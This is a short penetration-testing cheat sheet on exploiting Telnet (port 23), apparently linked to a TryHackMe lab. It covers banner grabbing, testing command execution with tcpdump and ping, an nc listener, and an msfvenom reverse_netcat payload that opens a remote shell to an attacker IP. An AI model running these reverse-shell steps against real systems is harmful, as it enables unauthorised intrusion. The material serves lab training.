# Port 23 Telnet

## Connective with telnet

May give out banner

```
telnet $IP $PORT
```

If we can not execute commands, check whether we can run system commands on the victim. Start tcp dumper locally.

```
sudo tcpdump ip proto \\icmp -i tun0
```

Then Ping the machine from victim telnet session

```
ping $IP -c 1
```

If we get any answer, it means, we can run commands on victim. 

```
.RUN ping 10.8.64.134 -c 1
```

So open a listener with nc. And then use the netcat reverse shell to connect to it

```
nc -lnvp 444
```

Now create a netcat payload with msfvenom and use that to get the shell

```
msfvenom -p cmd/unix/reverse_netcat LHOST=10.8.64.134 LPORT=444
```

<figure><img src="https://755681241-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fa5rXMZ1JAQhUeS7TtZkM%2Fuploads%2FUnRfrqvGtaoj4a0YVu8J%2Fimage.png?alt=media&#x26;token=cbb4e0a0-5fd0-4b93-815a-4c36e9dd348d" alt=""><figcaption><p><a href="https://tryhackme.com/room/networkservices">https://tryhackme.com/room/networkservices#</a></p></figcaption></figure>